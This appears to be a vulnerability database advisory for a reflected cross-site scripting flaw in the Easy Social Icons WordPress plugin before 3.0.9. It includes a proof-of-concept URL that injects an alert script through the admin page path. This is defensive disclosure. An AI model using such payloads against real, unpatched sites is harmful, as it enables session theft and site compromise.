WordPress Plugin Vulnerabilities

Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting

Description

The plugin does not escape the $_SERVER['PHP_SELF'] input before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php/</script><script>alert(/XSS/)</script>/?page=cnss_social_icon_page

Affects Plugins

Fixed in 3.0.9

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Ram Gall (Wordfence)
Verified
Yes

Timeline

Publicly Published
2021-08-30 (about 2 years ago)
Added
2021-09-01 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other